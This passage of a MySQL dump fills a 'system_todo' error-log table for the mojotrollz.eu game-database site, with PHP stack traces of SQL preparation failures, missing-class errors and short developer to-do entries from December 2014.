'/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (828, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'.id WHERE `table` = ? AND id = ?\' at line 1', 'b7fbef45a8704f2c640c44acdfac5e7e7c88d850', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\TAGS_GET\', \'SELECT * FROM m...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\TAGS_GET\', \'SELECT * FROM m...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/database/tags/tags.php(14): SYSTEM\\DB\\QP::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(28): tags::get(1, 1)\n#4 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_creature(\'1\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.024, '2014-12-21 23:22:09', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (829, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'.`id` WHERE `table` = ? AND id = ?\' at line 1', '9d0657bd512b2dd0598f1871901241f97c0f1a84', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\TAGS_GET\', \'SELECT * FROM m...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\TAGS_GET\', \'SELECT * FROM m...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/database/tags/tags.php(14): SYSTEM\\DB\\QP::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(28): tags::get(1, 1)\n#4 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_creature(\'1\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.024, '2014-12-21 23:21:58', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (830, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Column \'table\' in where clause is ambiguous', '87f50bf980e1ec3acadb8ffc298f9985efc654e7', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\TAGS_GET\', \'SELECT * FROM m...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\TAGS_GET\', \'SELECT * FROM m...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/database/tags/tags.php(14): SYSTEM\\DB\\QP::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(28): tags::get(1, 1)\n#4 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_creature(\'1\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.024, '2014-12-21 23:22:31', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=creature&id=1', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (831, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'table, id, type, value) VALUES(?,?,?,?) ON DUPLICATE KEY UPDATE value=VALUES(val\' at line 1', 'e8ff67d9b3e32b1c09d2bf69a6fa2eea3384d588', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\TAGS_SET\', \'INSERT INTO moj...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\TAGS_SET\', \'INSERT INTO moj...\', Array)\n#2 /home/web/webdir/mojotrollz/system/db/qq/QP.php(29): SYSTEM\\DB\\QP::QQ(Array, NULL)\n#3 /home/web/webdir/mojotrollz/mojotrollz/api/database/tags/tags.php(19): SYSTEM\\DB\\QP::QI(Array)\n#4 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_creature/saimod_mojotrollz_db_creature.php(11): tags::set(1, \'1\', 1, \'-2\')\n#5 [internal function]: saimod_mojotrollz_db_creature::sai_mod_saimod_mojotrollz_db_creature_action_tag(\'1\', \'{"1":"-2","2":"...\')\n#6 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#7 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#8 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#9 {main}', '37.24.148.242', 0.044, '2014-12-21 23:56:16', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_creature&action=tag&id=1&tags={%221%22:%22-2%22,%222%22:%22-2%22,%223%22:%22-2%22,%224%22:%22-2%22,%2210%22:%22-2%22,%2211%22:%22-2%22}', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (832, 'Exception', 'creatures taggable', 'd3e0c6abfc99d70c2babe35713793c58bb9ba210', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'creatures tagga...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-22 00:23:59', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=creatures%20taggable', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (833, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'Gnomeregan.png\' found.', '38f032ebd7b62432d96f63661a2d66ce1e6cc895', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'map\', \'Gnomeregan.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'map\', \'Gnomeregan.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-22 00:34:18', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=map&id=Gnomeregan.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, '2015-09-09 07:47:44'); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (834, 'Exception', 'Tag statistics', '7d79d4473822a900fb4567cbfc176819bab747a5', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Tag statistics\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-22 00:36:32', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Tag%20statistics', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (835, 'Exception', '1. Create Character', '35bec43807db4e90c67f945454822bde7be43671', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Create Characte...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.008, '2014-12-22 00:36:40', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Create%20Character', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 0, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (836, 'Exception', 'Object linkable', '186306eb785659c4d02f536846b3ac92d3ad56c3', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'Object linkable\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-22 00:59:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=Object%20linkable', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (837, 'Exception', 'remove tag info thingy in creature', '793bd1a4fb6b611c3b5e35c10924754531362d9e', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'remove tag info...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.242', 0.004, '2014-12-22 01:29:41', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_todo&action=add&todo=remove%20tag%20info%20thingy%20in%20creature', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 1, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (838, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\MAP_OBJECTS_MAPS', '1fef2dde039b564e59000185a16f96112e4624a6', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\MAP_OBJECTS...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(14): spl_autoload_call(\'DBD\\\\MAP_OBJECTS...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_object/saimod_mojotrollz_db_object.php(19): map::generate(2, \'32\')\n#3 [internal function]: saimod_mojotrollz_db_object::sai_mod_saimod_mojotrollz_db_object_action_object(\'32\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.06, '2014-12-22 03:56:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_object&action=object&id=32', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (840, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Unknown column \'creature.id\' in \'where clause\'', '03e39640060a9138a0cb6c995cbb184933c2c3be', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\MAP_OBJECTS...\', \'SELECT map, val...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\MAP_OBJECTS...\', \'SELECT map, val...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(14): SYSTEM\\DB\\QP::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_object/saimod_mojotrollz_db_object.php(19): map::generate(2, \'32\')\n#4 [internal function]: saimod_mojotrollz_db_object::sai_mod_saimod_mojotrollz_db_object_action_object(\'32\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.012, '2014-12-22 04:54:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_object&action=object&id=32', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (841, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Column \'id\' in on clause is ambiguous', '14e4d0e9e7c75877d994f9ff3534059ff1dd12ff', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'DBD\\\\MAP_OBJECTS...\', \'SELECT map, val...\', Array)\n#1 /home/web/webdir/mojotrollz/system/db/qq/QP.php(14): SYSTEM\\DB\\Connection->prepare(\'DBD\\\\MAP_OBJECTS...\', \'SELECT map, val...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/map/map.php(14): SYSTEM\\DB\\QP::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_object/saimod_mojotrollz_db_object.php(19): map::generate(2, \'32\')\n#4 [internal function]: saimod_mojotrollz_db_object::sai_mod_saimod_mojotrollz_db_object_action_object(\'32\')\n#5 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#6 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#7 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#8 {main}', '37.24.148.242', 0.008, '2014-12-22 04:58:44', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_object&action=object&id=32', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (842, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\DB_OBJECT_TEMPLATE_OBJECT', 'dc06d49c4e795eaa5d4e0c98a4637b1dc8993c2b', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\DB_OBJECT_T...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_object/saimod_mojotrollz_db_object.php(21): spl_autoload_call(\'DBD\\\\DB_OBJECT_T...\')\n#2 [internal function]: saimod_mojotrollz_db_object::sai_mod_saimod_mojotrollz_db_object_action_object(\'32\')\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#5 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#6 {main}', '37.24.148.242', 0.052, '2014-12-22 05:05:36', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_object&action=object&id=32', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (843, 'SYSTEM\\LOG\\ERROR', 'Prepared Statement prepare fail: Unknown column \'creature_template.entry\' in \'on clause\'', '8114d23904127878a4e275ae057d2691d2e12ff9', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 27, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(35): SYSTEM\\DB\\ConnectionMYS->prepare(\'search-object\', \'SELECT gameobje...\', Array)\n#1 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_object/saimod_mojotrollz_db_object.php(83): SYSTEM\\DB\\Connection->prepare(\'search-object\', \'SELECT gameobje...\', Array)\n#2 /home/web/webdir/mojotrollz/mojotrollz/sai/saimod_mojotrollz_db_object/saimod_mojotrollz_db_object.php(4): saimod_mojotrollz_db_object::sai_mod_saimod_mojotrollz_db_object(\'%\', \'{"1":"0","2":"-...\')\n#3 [internal function]: saimod_mojotrollz_db_object::sai_mod_saimod_mojotrollz_db_object_action_search(\'%\', \'{"1":"0","2":"-...\')\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#6 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#7 {main}', '37.24.148.242', 0.032, '2014-12-22 05:09:42', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_object&action=search&search=%&tags={%221%22:%220%22,%222%22:%22-1%22}', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (844, 'Exception', 'saimod object', 'd95449248add1a7d9a347e38e0da8725e7fc600c', 0, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_todo/saimod_sys_todo.php', 13, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_todo::sai_mod__SYSTEM_SAI_saimod_sys_todo_action_add(\'saimod object\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): 